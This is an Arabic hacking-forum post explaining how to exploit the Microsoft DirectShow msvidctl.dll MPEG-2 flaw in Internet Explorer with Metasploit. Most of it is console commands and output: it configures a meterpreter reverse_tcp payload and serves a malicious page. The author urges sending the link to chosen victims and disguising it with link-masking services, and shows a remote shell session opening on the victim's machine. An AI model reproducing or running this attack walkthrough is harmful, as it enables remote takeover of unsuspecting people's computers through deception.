عرض مشاركة واحدة
قديم 18/08/2010, 19:08   المشاركة رقم: 1
المعلومات
الكاتب:
 ZiRbE$t  
اللقب:
عضــــو جديــــد
الصورة الرمزية
 
الصورة الرمزية ZiRbE$t

البيانات
التسجيل : Aug 2010
العضوية : 470
الاهتمامات : هكر
الإقامة : الجزائر
المواضيع : 5
الردود : 19
المجموع : 24
بمعدل : 0.00 يوميا
الاختراقات : [ليس لدي حساب]
مجتمعنا : []
الصنف : Not Hacker
آخر تواجد : 20/07/2015/12:15
سبب الغياب : حاظر
معدل التقييم: 0
نقاط التقييم: 10
ZiRbE$t is on a distinguished road
شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة

 Algeria


الإتصالات
الحالة:
ZiRbE$t غير متواجد حالياً
وسائل الإتصال:

Talking شرح ثغرة Microsoft DirectShow (msvidctl.dll) القاتلة

اليوم أنا رح اشرحلكم أخطر ثغرة هذه الأيام والمايكروسفت احد الأن ما لقت لها

ترقيع لأنها ثغرة محقونة في ملف مهم من الويندوز وهو ملف msvidctl.dllوهذا الملف

معروف بأنه ملف ActiveX أي الملف الذي يتحكم بالصورة أظن بأن الكل يعرفه

والثغرة قد سميت بــــــــــــــــــــــــــ:

IE DirectShow (msvidctl.dll) MPEG-2

وقد تمت اضافة الثغرة الى التحديث الاخير للميتاسبلوات باسم

Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption

وهذا ما سأعتمد عليه في الشرح

البسيط أرجوا أن لا يكون الشرح صعب لأنه بالنسبة لي لم يكن كذلك فأرجوا أن يكون بالنسبة

لكم أيضا أحبائي المهم وبدون اطالة نبدأمع الشرح:

نقوم بفتح الميتا سبلوات وهذا بعد أخر تحديث طبعا

كود:
carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole [sudo] password for carlos: | | _) | __ `__ _ __| _` | __| __ | _ | __| | | | __/ | ( |__ | | | ( | | | _| _| _|___|__|__,_|____/ .__/ _|___/ _|__| _| =[ msf v3.3-dev + -- --=[ 384 exploits - 261 payloads + -- --=[ 20 encoders - 7 nops =[ 166 aux msf >
نقوم باختيار هذا الامر فهو الاهم

PAYLOAD => windows/meterpreter/reverse_tcp

لاحظا الخيارات :

كود:
msf > use exploit/windows/browser/msvidctl_mpeg2 msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(msvidctl_mpeg2) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Use SSL URIPATH no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
سينتج لنا بعد ذلك التالي:

كود:
msf exploit(msvidctl_mpeg2) > set SRVPORT 80 SRVPORT => 80 msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.158 LHOST => 192.168.1.158 msf exploit(msvidctl_mpeg2) > set URIPATH ChOrAhBiL SaFa7.html URIPATH => ChOrAhBiL SaFa7.html msf exploit(msvidctl_mpeg2) > exploit [*] Exploit running as background job. msf exploit(msvidctl_mpeg2) > [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:80/ChOrAhBiL SaFa7.html [*] Local IP: http://192.168.1.158:80/ChOrAhBiL SaFa7.html [*] Server started.
بعد ذلك نتتج لنا ملف من نوع gif نقوم بارساله هو والرابط لأي أحد نود استهدافه

http://192.168.1.158:80/ChOrAhBiL SaFa7.html

هذا الرابط لمن لم يفهم من الاحسن تمويه الرابط بمواقع التمويه لأنه ممكن يشك فيه هيك

بعدما يفتح الضحية الرابط ستمكننا الاكسبلورر من الاستغلال لاحظـــــــــــــــــــــوا:

كود:
[*] Sending HTML to 192.168.1.139:1126... [*] Sending exploit to 192.168.1.139:1126... [*] Sending GIF to 192.168.1.139:1126... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (206848 bytes) [*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.139:1127) msf exploit(msvidctl_mpeg2) > sessions -i 1 [*] Starting interaction with 1... meterpreter >

وكل الاحباب والاصدقاء بدون استثناء




آخر مواضيع » ZiRbE$t

توقيع : ZiRbE$t

عرض البوم صور ZiRbE$t   رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ ZiRbE$t على المشاركة المفيدة:
S4wDz (29/07/2012)
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115